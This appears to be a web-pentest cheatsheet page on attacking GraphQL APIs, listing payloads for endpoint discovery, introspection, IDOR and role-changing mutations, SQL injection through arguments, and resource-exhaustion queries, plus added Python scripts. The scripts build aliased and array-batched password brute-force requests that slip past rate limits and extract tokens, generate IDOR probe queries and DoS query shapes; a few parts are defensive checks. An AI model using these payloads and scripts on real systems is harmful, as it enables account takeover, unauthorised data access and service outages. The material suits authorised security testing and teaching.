web-pentest

GraphQL Attacks

GraphQL security testing — endpoint discovery and engine fingerprinting, introspection (and recovery when disabled), IDOR/authz via nodes & mutations, batching rate-limit bypass, DoS and injection.

Jun 2026 lazyhackers
Discovery (3)
POST /graphql {"query":"{__typename}"}
Confirm a GraphQL endpoint
discovery
paths: /graphql /api/graphql /v1/graphql /v2/graphql /graphiql /graphql/console /playground
Hunt the endpoint and any exposed IDE (GraphiQL, Playground); also try GET with ?query={__typename}, since some servers only answer one method
discovery endpoints
graphw00f -d -f -t https://target.com/graphql
Fingerprint the GraphQL engine
discovery graphw00f
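An added example (not from the original cheatsheet): a small endpoint prober that POSTs the `{__typename}` check to common paths and classifies each reply as a working GraphQL endpoint, a GraphQL-shaped error envelope (the endpoint exists but rejected the query), an exposed IDE page, or nothing. The path list and the IDE keywords are assumptions; the classifier runs offline on any captured response body.

```python
"""Probe candidate GraphQL paths with {__typename} and classify what comes back."""
import json
import urllib.error
import urllib.request

# Common GraphQL endpoint / IDE paths (assumed wordlist, extend as needed).
CANDIDATE_PATHS = [
    "/graphql", "/api/graphql", "/v1/graphql", "/v2/graphql",
    "/graphiql", "/graphql/console", "/playground", "/query",
]

PROBE = json.dumps({"query": "{__typename}"}).encode()


def classify(status: int, body: bytes) -> str:
    """Decide what a reply to the {__typename} probe tells us.

    'graphql'       - the server executed the query (data.__typename present)
    'graphql-error' - GraphQL error envelope: endpoint exists, query was rejected
    'ide'           - an HTML page that mentions a GraphQL IDE
    'none'          - nothing GraphQL-like
    """
    text = body.decode("utf-8", "replace")
    try:
        doc = json.loads(text)
    except ValueError:
        doc = None
    if isinstance(doc, dict):
        data = doc.get("data")
        if isinstance(data, dict) and "__typename" in data:
            return "graphql"
        if isinstance(doc.get("errors"), list):
            return "graphql-error"
    lowered = text.lower()
    if "<html" in lowered and any(k in lowered for k in ("graphiql", "playground", "altair")):
        return "ide"
    return "none"


def probe(base: str, path: str, timeout: float = 5.0) -> tuple[int, bytes]:
    """POST the probe to base+path and return (status, body). This is the only network call."""
    req = urllib.request.Request(
        base.rstrip("/") + path, data=PROBE, method="POST",
        headers={"Content-Type": "application/json", "Accept": "application/json, text/html"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:       # 4xx/5xx still carry a useful body
        return e.code, e.read()
    except (urllib.error.URLError, OSError):
        return 0, b""


def discover(base: str) -> dict[str, str]:
    """Return {path: verdict} for every candidate path that looked GraphQL-like."""
    hits = {}
    for path in CANDIDATE_PATHS:
        verdict = classify(*probe(base, path))
        if verdict != "none":
            hits[path] = verdict
    return hits


if __name__ == "__main__":
    import sys
    for path, verdict in discover(sys.argv[1]).items():
        print(f"{verdict:14s} {path}")
```

Run it as `python probe.py https://target.com`; a `graphql-error` verdict is still a hit worth following up, because the message often names the engine (a 400 with "Must provide query string" is typical of graphql-express style servers).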
Introspection (4)
{__schema{types{name fields{name}}}}
Minimal introspection — dump every type with its field names (request each field's args and the kind/ofType of its type for the full schema)
introspection recon
{__schema{queryType{fields{name}} mutationType{fields{name}}}}
List all queries and mutations
introspection
{__type(name:"User"){fields{name type{name kind}}}}
Inspect a specific type's fields
introspection type
clairvoyance -o schema.json https://target.com/graphql
Recover the schema from "Did you mean …" field-suggestion errors when introspection is disabled (-w supplies your own wordlist); before that, retry introspection over GET or with a newline after __schema, since naive filters only match the literal __schema{ token
introspection clairvoyance
Authz / IDOR (3)
{user(id:1002){email phone}}
IDOR via a node argument
idor authz
mutation{updateUser(id:1002,role:"admin"){id}}
Authz bypass / mass assignment via a mutation
authz mutation
{node(id:"VXNlcjoxMDAy"){...on User{email}}}
Relay global-id IDOR — the id is base64("User:1002"); decode, change the number or the type prefix, re-encode
idor relay
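An added example covering both the introspection and the authz/IDOR entries above (it is not part of the original cheatsheet): parse an introspection result, print the query/mutation signatures, list every root field that takes an ID-like argument (the first IDOR and mass-assignment candidates), and generate probe queries for a range of ids, plain or Relay-encoded. `SAMPLE_INTROSPECTION` is a constructed schema for an imaginary app; the `user`, `node`, `updateUser` names mirror the cheatsheet's placeholders.

```python
"""Walk an introspection result and turn it into IDOR / authz probe queries."""
import base64


def _ref(name, kind="SCALAR", non_null=False):
    """Build an introspection type reference; NON_NULL wraps the named type in ofType."""
    ref = {"kind": kind, "name": name, "ofType": None}
    return {"kind": "NON_NULL", "name": None, "ofType": ref} if non_null else ref


ID_REQ = _ref("ID", non_null=True)

# Constructed sample of what {__schema{...}} returns; not captured from a real target.
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "me", "args": [], "type": _ref("User", "OBJECT")},
            {"name": "user", "args": [{"name": "id", "type": ID_REQ}], "type": _ref("User", "OBJECT")},
            {"name": "node", "args": [{"name": "id", "type": ID_REQ}], "type": _ref("Node", "INTERFACE")},
        ]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "updateUser",
             "args": [{"name": "id", "type": ID_REQ}, {"name": "role", "type": _ref("String")}],
             "type": _ref("User", "OBJECT")},
        ]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "id", "args": [], "type": _ref("ID")},
            {"name": "email", "args": [], "type": _ref("String")},
            {"name": "role", "args": [], "type": _ref("String")},
        ]},
    ]}}}


def type_str(t):
    """Render a type reference the way SDL prints it, e.g. ID! or [User]."""
    if t["kind"] == "NON_NULL":
        return type_str(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + type_str(t["ofType"]) + "]"
    return t["name"]


def base_name(t):
    """Strip NON_NULL / LIST wrappers and return the named type."""
    while t.get("ofType"):
        t = t["ofType"]
    return t["name"]


def _root_types(introspection):
    schema = introspection["data"]["__schema"]
    by_name = {t["name"]: t for t in schema["types"]}
    for op in ("query", "mutation"):
        root = schema.get(op + "Type")
        if root:
            yield op, by_name[root["name"]].get("fields") or []


def root_fields(introspection):
    """{'query': [signature, ...], 'mutation': [...]} for every root field."""
    out = {"query": [], "mutation": []}
    for op, fields in _root_types(introspection):
        for f in fields:
            args = ", ".join(f"{a['name']}: {type_str(a['type'])}" for a in f["args"])
            head = f"{f['name']}({args})" if f["args"] else f["name"]
            out[op].append(f"{head}: {type_str(f['type'])}")
    return out


def id_taking_fields(introspection):
    """(op, field, arg) for every root field argument typed ID or named *id: test these first."""
    hits = []
    for op, fields in _root_types(introspection):
        for f in fields:
            for a in f["args"]:
                if base_name(a["type"]) == "ID" or a["name"].lower().endswith("id"):
                    hits.append((op, f["name"], a["name"]))
    return hits


def relay_id(typename, n):
    """Relay-style global ID: base64('Type:n')."""
    return base64.b64encode(f"{typename}:{n}".encode()).decode()


def decode_relay_id(gid):
    """Inverse of relay_id; raises ValueError if the blob is not 'Type:n'."""
    typename, _, n = base64.b64decode(gid).decode().partition(":")
    if not n.isdigit():
        raise ValueError("not a Type:number global id")
    return typename, int(n)


def idor_probes(op, field, arg, ids, selection="id", relay_type=None):
    """One query per candidate id; with relay_type the ids are wrapped as global ids."""
    probes = []
    for i in ids:
        value = f'"{relay_id(relay_type, i)}"' if relay_type else str(i)
        probes.append(f"{op}{{{field}({arg}:{value}){{{selection}}}}}")
    return probes


if __name__ == "__main__":
    for op, sigs in root_fields(SAMPLE_INTROSPECTION).items():
        print(op, sigs)
    print(id_taking_fields(SAMPLE_INTROSPECTION))
```

Feed the output of `clairvoyance -o schema.json` or a saved introspection response into `root_fields` / `id_taking_fields` instead of the sample; send each probe once as the victim and once as a low-privileged user and diff the responses, which is the actual authz test.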
Rate-Limit Bypass (Batching) (2)
{a:login(u:"x",p:"1"){t} b:login(u:"x",p:"2"){t} c:login(u:"x",p:"3"){t}}
Alias many attempts in ONE request to beat per-request rate limits (alias names must be unique; wrap them in mutation{} when login is a mutation, and the server then runs them serially)
batching bruteforce
[{"query":"mutation{...}"},{"query":"mutation{...}"}]
Array/JSON batching — a list of operations in one HTTP body, only where the server enables batched requests; responses come back as a list in the same order
batching
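An added example, not from the original cheatsheet, that builds both request shapes above for a password list and maps the reply back to the credential that produced a token. The mutation name `login`, the argument names `username`/`password` and the `token` selection are placeholders assumed for the example; `count_operations` is the defender-side view, the number of attempts hiding in one request body, which is what a rate limiter has to count instead of requests.

```python
"""Alias batching and array batching for a one-request credential brute force."""
import json
import re

LOGIN_FIELD = "login"                              # assumed mutation name
USER_ARG, PASS_ARG, SELECT = "username", "password", "token"   # assumed arg/field names


def alias_batch(user, passwords, field=LOGIN_FIELD):
    """One mutation with N aliased attempts. Each alias carries its own password; the
    server executes all of them under a single HTTP request, so a per-request limiter
    sees one attempt."""
    parts = [
        f"a{i}:{field}({USER_ARG}:{json.dumps(user)},{PASS_ARG}:{json.dumps(pw)}){{{SELECT}}}"
        for i, pw in enumerate(passwords)
    ]
    return {"query": "mutation{" + " ".join(parts) + "}"}


def array_batch(user, passwords, field=LOGIN_FIELD):
    """JSON-array batching: a list of independent operations in one body."""
    return [
        {"query": f"mutation{{{field}({USER_ARG}:{json.dumps(user)},{PASS_ARG}:{json.dumps(pw)}){{{SELECT}}}}}"}
        for pw in passwords
    ]


def winners(alias_response, passwords):
    """Map aliases that returned a token back to the password that produced them.
    Failed aliases come back as null in data plus an entry in errors; both are skipped."""
    data = alias_response.get("data") or {}
    hits = {}
    for i, pw in enumerate(passwords):
        result = data.get(f"a{i}")
        if isinstance(result, dict) and result.get(SELECT):
            hits[pw] = result[SELECT]
    return hits


def array_winners(array_response, passwords):
    """Same for an array batch: the reply is a list in request order."""
    hits = {}
    for pw, item in zip(passwords, array_response):
        result = (item.get("data") or {}).get(LOGIN_FIELD)
        if isinstance(result, dict) and result.get(SELECT):
            hits[pw] = result[SELECT]
    return hits


def count_operations(body, field=LOGIN_FIELD):
    """Defender-side check: how many login attempts are inside one request body?"""
    if isinstance(body, list):
        return sum(count_operations(b, field) for b in body)
    return len(re.findall(rf"\b{field}\s*\(", body["query"]))


if __name__ == "__main__":
    print(json.dumps(alias_batch("x", ["1", "2", "3"])))
    print(json.dumps(array_batch("x", ["1", "2", "3"])))
```

Send the dict from `alias_batch` as the JSON body of one POST and pass the parsed reply to `winners`; a server that counts aliases or resolver invocations per request (or caps batch size) will refuse the request, which is the fix you should recommend.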
DoS (2)
query{a{b{a{b{a{b{name}}}}}}}
Deeply nested / circular query to exhaust resources
dos nesting
{__schema{types{fields{type{fields{type{name}}}}}}}
Introspection-driven amplification — nested type/fields/type traversal; alias amplification (the same resolver under many aliases) and field duplication (one leaf repeated hundreds of times) work the same way
dos amplification
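An added example, not part of the original cheatsheet, with generators for the three DoS shapes above (circular nesting, alias amplification, field duplication) and the static cost check a server should apply before executing: maximum depth, alias count and per-field repetition, computed by a small tokenizer that ignores string literals and argument lists. The field names and the limits in `within_limits` are assumptions chosen for the example.

```python
"""Generate resource-exhaustion queries and the static cost checks that reject them."""
from collections import Counter


def nested_query(depth, fields=("a", "b"), leaf="name"):
    """Circular nesting: query{a{b{a{b{...{name}}}}}} with `depth` object levels."""
    body = leaf
    for i in reversed(range(depth)):
        body = f"{fields[i % len(fields)]}{{{body}}}"
    return "query{" + body + "}"


def alias_amplification(field, n, args="id:1", selection="name"):
    """Alias amplification: the same resolver fired n times inside one operation."""
    return "{" + " ".join(f"q{i}:{field}({args}){{{selection}}}" for i in range(n)) + "}"


def field_duplication(field, n, selection="name"):
    """Field duplication: one leaf repeated n times under a parent (engines that do not
    merge identical fields resolve it n times)."""
    return "{" + field + "{" + " ".join([selection] * n) + "}}"


def query_cost(query):
    """Static metrics a limiter computes before execution: max nesting depth, alias count,
    per-field occurrence counts. String literals are skipped so braces inside argument
    values do not count, and names inside (...) are arguments rather than fields."""
    depth = max_depth = paren = aliases = 0
    fields = Counter()
    skip_next = False            # set after `on`, so `...on User` does not count User as a field
    i, n = 0, len(query)
    while i < n:
        c = query[i]
        if c == '"':
            i += 1
            while i < n and query[i] != '"':
                i += 2 if query[i] == "\\" else 1
        elif c == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif c == "}":
            depth -= 1
        elif c == "(":
            paren += 1
        elif c == ")":
            paren -= 1
        elif paren == 0 and (c.isalpha() or c == "_"):
            j = i
            while j < n and (query[j].isalnum() or query[j] == "_"):
                j += 1
            name = query[i:j]
            k = j
            while k < n and query[k].isspace():
                k += 1
            if k < n and query[k] == ":":    # `alias: field` outside an argument list
                aliases += 1
                i = k + 1
                continue
            if name == "on":
                skip_next = True
            elif skip_next:
                skip_next = False
            elif depth > 0:                  # depth 0 holds only keywords and operation names
                fields[name] += 1
            i = j
            continue
        i += 1
    return {"depth": max_depth, "aliases": aliases, "fields": fields}


def within_limits(query, max_depth=10, max_aliases=20, max_field_repeats=20):
    """Example limits; all three generators above fail at least one of them."""
    c = query_cost(query)
    return (c["depth"] <= max_depth and c["aliases"] <= max_aliases
            and max(c["fields"].values(), default=0) <= max_field_repeats)


if __name__ == "__main__":
    for q in (nested_query(12), alias_amplification("user", 50), field_duplication("user", 100)):
        print(query_cost(q)["depth"], query_cost(q)["aliases"], within_limits(q), q[:60])
```

When testing, raise the depth or alias count gradually and watch response time rather than sending a huge query first: a server that accepts depth 30 but answers in constant time has a query cost limiter that is simply not counting what you sent.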
Injection & Tooling (3)
{user(id:"1 OR 1=1"){id}}
SQL/NoSQL injection through a GraphQL argument — the argument is just a string handed to the resolver; deliver the same payload via variables and input-object fields too, and note that an ID! argument still accepts any string
injection sqli
InQL (Burp) / graphql-cop / batchql
Tooling — schema parsing, security audit, batching attacks
tooling
nuclei -tags graphql -u https://target.com/graphql
Automated GraphQL misconfiguration checks
tooling nuclei